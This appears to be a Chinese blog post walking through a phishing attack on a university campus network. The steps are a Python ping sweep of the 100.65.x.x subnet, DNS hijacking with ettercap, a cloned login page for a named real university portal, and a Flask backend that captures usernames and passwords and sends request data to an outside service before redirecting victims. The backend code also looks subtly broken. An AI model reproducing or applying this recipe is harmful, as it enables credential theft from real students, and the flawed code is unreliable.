校园局域网钓鱼实例

Hello ! 我是"我是小恒不会java"

本文仅作为针对普通同学眼中的网络安全,设计的钓鱼案例也是怎么简陋怎么来

注:本文不会外传代码,后端已停止使用,仅作为学习使用

基本原理

内网主机扫描+DNS劫持+前端模拟+后端HTTP请求保存日志+前端重定向至真实网站

仿制前端

原本站点网址,这是作者仿制后实现的,后端Flask框架(打码了)

https://ca.csu.edu.cn/

内网主机扫描

python 复制代码
import os
import platform

def ping(host):
    if platform.system() == "Windows":
        response = os.system("ping -n 1 " + host)
    else:
        response = os.system("ping -c 1 " + host)
    return response == 0

with open("active_ips.txt", "w") as f:
    for i in range(0, 255):
        for j in range(0, 255):
            ip = "100.65.{}.{}".format(i, j)
            if ping(ip):
                print("{} is active".format(ip))
                f.write(ip + "\n")

python太慢,建议用批处理脚本。第一次写,没必要,就先用了

DNS劫持

准备:一台kail linux主机,连接校园网,使用ettercap进行DNS劫持

修改/etc/ettercap/etter.dns文件,根据提示按需进行劫持配置

先打开阿帕奇服务器,试试可用性,成功则如下图所示

前端仿制

主要是针对移动端,我就只针对移动端进行特意修改

加上form表单,和falsk后端匹配。设置应用的秘钥,用于加密session数据。

实现一个简单的session登陆验证,并向后端发送加密信息,等待服务器响应

后端

python 复制代码
def save_request_data():
    target_url = request.json['target_url']
    save_path = request.json['save_path']

    # 准备请求参数
    request_data = {
        'method': 'POST', 
        'url': target_url,
        'headers': request.headers.to_list(),  # 保存当前请求的 headers 为例
        'data': request.get_json() 
    }

    # 发送请求到 httpbin(一个用于测试 HTTP 请求和响应的工具服务),以获取原始请求数据
    response = requests.post('https://httpbin.org/anything', json=request_data)

    if response.status_code == 200:
        # 解析 httpbin 返回的 JSON 数据,提取原始请求数据
        raw_request_data = response.json()['req']

        # 将原始请求数据写入文件
        with open(save_path, 'w', encoding='utf-8') as f:
            json.dump(raw_request_data, f, ensure_ascii=False, indent=4)

        return jsonify({'status': 'success', 'message': 'HTTP request data saved successfully.'})
    else:
        return jsonify({'status': 'error', 'message': f'Received non-successful status code {response.status_code} from the server.'}), response.status_code

服务器端保存请求内容,并正常返回响应,从而达到获取username和password的目的

重定向

在前端点击登陆后重定向至正确网址,用户只会认为网页卡顿了,再次输入信息后成功登陆校园门户网络

相关推荐
真真-真真13 分钟前
WebXR
linux·运维·服务器
轩辰~36 分钟前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
Mitch3111 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.1 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3111 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
ccc_9wy1 小时前
暗月红队考核靶场ack123的测试报告[细节](二)
网络安全·暗月ack123·socks5内网代理·mssql漏洞·杀软对抗·制作免杀木马·烂土豆提权
雨中rain1 小时前
Linux -- 从抢票逻辑理解线程互斥
linux·运维·c++
Bessssss2 小时前
centos日志管理,xiao整理
linux·运维·centos
s_yellowfish2 小时前
Linux服务器pm2 运行chatgpt-on-wechat,搭建微信群ai机器人
linux·服务器·chatgpt
豆是浪个2 小时前
Linux(Centos 7.6)yum源配置
linux·运维·centos